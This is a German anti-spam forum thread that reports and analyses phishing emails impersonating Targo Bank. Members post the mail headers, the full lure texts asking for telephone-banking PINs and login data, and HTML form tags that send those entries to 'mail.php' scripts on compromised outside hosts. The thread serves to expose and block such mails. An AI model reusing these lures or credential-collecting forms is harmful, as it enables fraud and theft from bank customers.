Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 44

Thema: Targo Bank phishing

Hybrid-Darstellung

Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
  1. #1
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard Targo Bank phishing

    Mein altbekannter Phishki mit dem Form-Skript im HTML-Anhang:


    header:
    01: Received: from lindner.vds.internetx.de ([85.236.36.215]) by mx-ha.gmx.net
    02: (mxgmx012) with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: (qmail 5945 invoked from network); 23 Aug 2013 xx:xx:xx +0200
    04: Received: from 208-40-110-196.ipv4.firstcomm.com (HELO User) (208.40.110.196) by
    05: 215-36-236-85.rev.customer-net.de with SMTP; 23 Aug 2013 xx:xx:xx +0200

    Aktualisierung Ihres Telefon-Banking PINs

    Sehr geehrte Kundin,
    sehr geehrter Kunde,

    Unser Sicherheitssystem hat einen Fehler im Telefonbanking gemeldet.
    Um unser Telefonbanking noch sicherer zu machen und missnbräuchliche
    Verwendungen zu vermeiden,
    ist eine Aktualisierung Ihres Telefonbanking-PIN notwendig.

    Ihrenen Telefon-Banking-PIN können Sie hier ändern, gehen Sie wie folgt vor.

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus in klicken Sie dann auf "Verifizieren"!

    Mit freundlichen Grüßen

    Peter Herrmann
    Sicherheitsteam Telefonbanking
    Targo Bank
    Im Anhang:

    [HTML]<form action="http://capital95.com.br/css/.../mail.php" name="bloc_ident" autocomplete="off" method="post">[/HTML]

    IP: 184.154.122.74 ---> SINGLEHOP
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  2. #2
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    neuer Anlauf der Russenmafia:

    whois: [Link nur für registrierte Mitglieder sichtbar. ]

    IP: 176.9.27.148 ---> Hetzner

    Hetzner mal wieder. Bürgt mittlerweile für allerbeste deutsche Schwarzhut-Qualität.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  3. #3
    Mittwoch
    Gast

    Standard

    Zur Offtopic-Diskussion über die Servicequalität des Hosters Hetzner geht es hier entlang *klick*.

  4. #4
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Wieder mal, diesmal Joomla gecrackt:


    header:
    01: Received: from mail.bsdinfo.ru ([78.107.252.101]) by mx-ha.gmx.net (mxgmx008)
    02: with ESMTPS (Nemesis) ID: [ID filtered]
    03: Received: from User (p5099b9f7.dip0.t-ipconnect.de [80.153.185.247]) by
    04: mail.bsdinfo.ru (Postfix) with ESMTPA ID: [ID filtered]

    Sehr geehrte(r) Kunde(in),

    Als Sicherheitsmaßnahme müssen wir Ihre Daten aus Online-Banking
    überprüfen.
    Bitte bestätigen Sie Ihre Zugangsdaten einmalig.
    Anschließend können Sie sich wieder wie gewohnt mit Ihren Zugangsdaten
    anmelden.

    Gehen Sie wie folgt vor.

    1. Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen mit"
    aus!
    2. Füllen Sie alle Daten aus in klicken Sie dann auf "Verifizieren"!

    Mit freundlichen Grüßen
    Targo Bank
    im HTML-Anhang:

    [HTML]<form id="GoSuivant" action="http://biok.cz/language/x/mail.php" method="post" onsubmit="return validate2(this)">[/HTML]

    IP: 87.118.106.220 ---> ns.km10532-05.keymachine.de
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  5. #5
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Die altbekannte Ganoven, diesmal mit doppelt verschlüsseltem HTML-Anhang:


    header:
    01: Received: from mir3web.iboard.net.ua (mir3web.iboard.net.ua [77.87.40.67])
    02: (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
    03: (No client certificate requested)
    04: by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
    05: for xxxxx; Thu, 31 Oct 2013 xx:xx:xx +0100 (CET)
    06: Received: from [213.177.225.235] (helo=User)
    07: by mir3web.iboard.net.ua with esmtpa (Exim 4.80.1 (FreeBSD))
    08: (envelope-from <direkt [at] targobank.de>)
    09: ID: [ID filtered]

    IP: 213.177.225.235 ---> 213.177.225.235.adsl.griffin.net.uk

    Guten Tag,

    Unser System hat festgestellt, dass Ihr Telefon-Banking PIN aus
    Sicherheitsgründen
    geändert werden muss. Bitte benutzen Sie dieses Formular
    um die Änderung Ihres Telefon-Banking PIN kostenfrei zu ändern.

    Andernfalls müssen wir Ihr Konto mit 14,99€ belasten
    und die Änderung schriftlich über den Postweg bei Ihnen einfordern.

    Ihren Telefon-Banking PIN können Sie
    hier
    oder wie folgt ändern:

    1. Laden Sie die angehängte Datei und füllen Sie es. Wenn tut man nicht
    downloaden es bitte
    Öffnen Sie die Datei in Ihrem Emailanhang und wählen Sie "öffnen
    mit" aus!
    2. Füllen Sie alle Daten aus und klicken Sie dann auf "Bestätigen"!
    3. Ihr Telefon-Banking PIN aktiviert sich nach 5-7 Werktagen!
    4. Weil wir ein hohes Maß an Daten-Verschlüsselung verwenden, wenn Sie
    Internet
    Explorer verwenden,
    um die Sicherheit zu öffnen, müssen Sie auf dem Pop-up erscheint,
    klicken
    Sie, und wählen Sie
    erlauben Inhalt.

    Für weitere Fragen steht unser Online Support unter [Link nur für registrierte Mitglieder sichtbar. ]
    24Std.
    für Sie zur Verfügung.


    Mit freundlichen Grüßen

    TARGOBANK
    Als Anhang dann eine Dokument.htm, die in der URL whois: [Link nur für registrierte Mitglieder sichtbar. ] enthält.

    IP: 207.45.188.242 ---> zero.securenet-server.net

    Die Domain ist anscheinend bei aktuellen Virenwächtern schon einschlägig bekannt.
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  6. #6
    Urgestein
    Registriert seit
    18.07.2005
    Beiträge
    10.069

    Standard

    Wieder die altbekannten Ganoven, diesmal Wordpress gecrackt:


    header:
    01: Return-Path: office [at] targobank.de
    02: Received: from s16.wlserver.nl ([193.23.143.167]) by mx-ha.gmx.net (mxgmx112)
    03: with ESMTPS (Nemesis) ID: [ID filtered]
    04: Received: from [72.248.96.246] (helo=User) by s16.wlserver.nl with esmtpa (Exim
    05: 4.80.1) (envelope-from <office [at] targobank.de>) ID: [ID filtered]

    Sehr geehrter Kunde,

    ----------------------------------------------------------------------------------------

    Wir haben eine unregelmäßige Aktivität ihrer TargoBank Konto erkannt.
    Zu Ihrem eigenen Schutz müssen wir diesen Vorgang überprüfen
    und Ihre TargoBank Konto vorläufig eingeschränken. Bitte laden Sie das
    Dokument im eMail Anhang und überprüfen Sie Ihre Daten. Sollte
    Sie diese eMail ignorieren wird Ihre Konto vorübergehend gesperrt.

    -----------------------------------------------------------------------------------------

    Bitte beachten Sie, dass die Benutzung der Website durch Sie informiert
    bleiben
    TargoBank
    Nutzen Sie die Gelegenheit, unser Unternehmen und Reserven.

    Danke,
    Kundendienst.

    © 2014 Targo Bank AG
    Im HTML-Anhang wieder das Skript:

    [HTML]<form id="GoSuivant" action="http://habbab.com.tr/wp-includes/images/wlw/.1/mail.php"
    method="post" onsubmit="return validate2(this)">[/HTML]

    IP: 217.195.198.8 ---> ns1.realsunucu.com, Türkei
    mein Credo: die 10 größten ROKSO-Spammer aus dem Verkehr gezogen, und 80 % des weltweiten Spam-Problems hätte sich mit einem Schlag erledigt....
    Ausserdem fordere ich die Abschaffung aller Affiliate-Programme, da mir bis heute niemand ein 100 % seriöses Affiliate-Programm benennen konnte.

  7. #7
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Böse

    Diese Mail hat mein "Donnervogel" leider nicht als Spam erkannt.

    Anhand der Betreffzeile hatte ich erst gedacht, es ist eine Phishing Mail. Als ich mir die Datei später im Spamordner genauer angeschaut habe, entpuppte sie sich als stinknormaler deutschsprachiger Spam. Hier wird noch auf eigene Rechnung gespamt. whois: [Link nur für registrierte Mitglieder sichtbar. ]
    Auf die Antwort auf den T5F bin ich ja mal gespannt.

    WEB.de ist sowas von inkontinent. Darüber wurde der Spam nämlich "ausgeschieden"

    header:
    01: Received: from mout.web.de ([212.227.17.12]) by mx-ha.gmx.net (mxgmx011
    02: [212.227.15.9]) with ESMTPS (Nemesis) ID: [ID filtered]
    03: <ich armes spamopfer bei gmx.de>; Sat, 16 Mar 2019 xx:xx:xx +0100
    04: Received: from [212.227.17.8] ([212.227.17.8]) by mx-ha.web.de (mxweb110
    05: [212.227.17.8]) with ESMTPS (Nemesis) ID: [ID filtered]
    06: <ich armes spamopfer bei gmx.de>; Sat, 16 Mar 2019 xx:xx:xx +0100
    07: Received: from smtp78.ord1d.emailsrvr.com ([184.106.54.78]) by mx-ha.web.de
    08: (mxweb110 [212.227.17.8]) with ESMTPS (Nemesis) ID: [ID filtered]
    09: for <ich armes spamopfer bei web.de>; Sat, 16 Mar 2019 xx:xx:xx +0100
    10: Received: from smtp10.relay.ord1d.emailsrvr.com (localhost [127.0.0.1])
    11: by smtp10.relay.ord1d.emailsrvr.com (SMTP Server) with ESMTP ID: [ID filtered]
    12: for <ich armes spamopfer bei web.de>; Sat, 16 Mar 2019 xx:xx:xx -0400 (EDT)
    13: X-Auth-ID: [ID filtered]
    14: Received: by smtp10.relay.ord1d.emailsrvr.com (Authenticated sender:
    15: dgwuaqooqmpxkp-AT-tcsuccess.local) with ESMTPSA ID: [ID filtered]
    16: for <ich armes spamopfer bei web.de>; Sat, 16 Mar 2019 xx:xx:xx -0400 (EDT)
    17: X-Sender-ID: [ID filtered]
    18: Received: from mta9.mfp.underarmour.com ([UNAVAILABLE]. [23.253.56.78])
    19: (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384)
    20: by 0.0.0.0:465 (trex/5.7.12);
    21: Sat, 16 Mar 2019 xx:xx:xx -0400
    22: Content-Type: text/html; charset="utf-8"
    23: MIME-Version: 1.0
    24: Content-Transfer-Encoding: 8bit
    25: Subject: =?utf-8?b?QXcgOlZlcnBmbGljaHRlbmQgw5xiZXJwcsO8ZnVuZw==?= || Mein Nickname
    26: From: =?utf-8?b?VEFSR09CQU5L?= <no.replynotification [at] targobank.de>
    27: To:ich armes spamopfer bei web.de
    28: Reply-To: =?utf-8?b?VEFSR09CQU5L?= <no.replynotification [at] targobank.de>
    29: Message-ID: [ID filtered]
    30: Date: Tue, 19 Mar 2019 xx:xx:xx +0000 (GMT)
    31: X-Spam-Flag: NO

    Ergänzungen und Anonymisierungen farblich durch mich gekennzeichnet

    Zitat Zitat von SVH Handels-GmbH Dortmund

    Betreff:
    Aw :Verpflichtend Überprüfung ||mein Nickname

    Kostenloser Paketversand ab 50 €

    innerhalb Deutschlands

    Nur bis Sonntag!
    35% Rabatt
    auf die folgenden Artikel
    Rabatt-Code: YIPPI35
    Nur solange der Vorrat reicht.


    92-tlg Steckschlüssel-Satz 1/4""+ 1/2""Zoll Akku Roboter-Rasenmäher Indego 350 | 18V | 350 m² 18V Akku-Schlagschrauber SSW 18 | ohne Akku ohne Ladegerät im Karton
    Preis inkl. Gutschein 62,87 € Preis inkl. Gutschein 417,85 € Preis inkl. Gutschein 115,85 €
    Zum Angebot Zum Angebot Zum Angebot


    Akku Fugenreiniger GE-CC 18 Li Kit | 1x Akku 2.0 Ah 10.8V Akku Bohrschrauber BS + ASE Akku Säbelsäge Akkuset Combo Set in Tasche Heckenschere AHS 70-34 | 700 Watt
    Preis inkl. Gutschein 57,30 € Preis inkl. Gutschein 111,45 € Preis inkl. Gutschein 120,47 €
    Zum Angebot Zum Angebot Zum Angebot

    ABMELDUNG
    Klicken Sie hier wenn Sie diesen Newsletter
    nicht mehr erhalten möchten.
    IMPRESSUM
    SVH Handels-GmbH
    Unterste-Wilms-Str. 53
    44143 Dortmund
    Telefon: 0231 / 3368-0
    Telefax: 0231 / 3368-1000
    E-Mail: whois: [Link nur für registrierte Mitglieder sichtbar. ]" target="_blank"> [Link nur für registrierte Mitglieder sichtbar. ]
    Registriergericht: Dortmund HRB 26559
    Geschäftsführer: K. H. (w)
    A.S. (m)
    Ust.Id Nr.: DE 815 478 335
    Angaben zum Datenschutz


    GEPRÜFTE LEISTUNG

    Bitte antworten Sie nicht auf diese E-Mail, da Ihre Nachricht leider nicht weitergeleitet werden kann.
    Sollten Sie Hilfe benötigen, stehen wir Ihnen gerne telefonisch unter 0231/3368-0 oder per Mail zur Verfügung.
    Telefonisch erreichen Sie uns in der Zeit von Mo.-Fr. zwischen 08.00 und 17.00 Uhr.
    Alle Preise in Euro inkl. gesetzlicher Umsatzsteuer
    und Versandkosten.
    Alle Angebote in diesem Newsletter sind freibleibend
    und gelten nur solange der Vorrat reicht.
    Macht es evtl. Sinn der Targobank mal einen Tipp zu geben, dass hier jemand ihren "guten Namen" zum Spammen benutzt?
    Geändert von schara56 (18.03.2019 um 07:50 Uhr) Grund: Irreführenden Titel gelöscht

  8. #8
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.601

    Standard

    Was mir daran komisch vorkommt, sind folgende Header-Zeilen.
    Code:
    07: Received: from smtp78.ord1d.emailsrvr.com ([184.106.54.78]) by mx-ha.web.de
    08:  (mxweb110 [212.227.17.8]) with ESMTPS (Nemesis) ID: [ID filtered]
    09:  for <ich armes spamopfer bei web.de>; Sat, 16 Mar 2019 xx:xx:xx +0100
    [...]
    28: Reply-To: =?utf-8?b?VEFSR09CQU5L?= <no.replynotification [at] targobank.de>
    1) Warum wird über die USA gespamt und im DNS ist die abgehende IP (whois:184.106.54.78) nicht als SPF gesetzt.
    2) Warum wird als Reply-To @targobank.de angegeben?
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

  9. #9
    Mitglied
    Registriert seit
    30.01.2011
    Ort
    Thüringen
    Beiträge
    470

    Standard

    Zitat Zitat von schara56 Beitrag anzeigen
    Was mir daran komisch vorkommt, sind folgende Header-Zeilen.
    Code:
    07: Received: from smtp78.ord1d.emailsrvr.com ([184.106.54.78]) by mx-ha.web.de
    08:  (mxweb110 [212.227.17.8]) with ESMTPS (Nemesis) ID: [ID filtered]
    09:  for <ich armes spamopfer bei web.de>; Sat, 16 Mar 2019 xx:xx:xx +0100
    [...]
    28: Reply-To: =?utf-8?b?VEFSR09CQU5L?= <no.replynotification [at] targobank.de>
    1) Warum wird über die USA gespamt und im DNS ist die abgehende IP (whois:184.106.54.78) nicht als SPF gesetzt.
    2) Warum wird als Reply-To @targobank.de angegeben?
    1) Könnte ich mir noch so erklären, das web.de mittlerweile auch einen Server in den USA hat; angemietet oder gekauft. Btw. Was ist SPF?
    2) kann ich mir auch nicht erklären

    Übrigens, habe ich jetzt erst realisiert. Die Spam-Mail ist auf den 19.3.2019 vordatiert

  10. #10
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.601

    Standard

    Kannst Du bitte im Quelltext die 'href' mal genauer anschauen?
    Das sieht ein bisschen wie Phishing aus.
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

Seite 1 von 2 12 LetzteLetzte

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen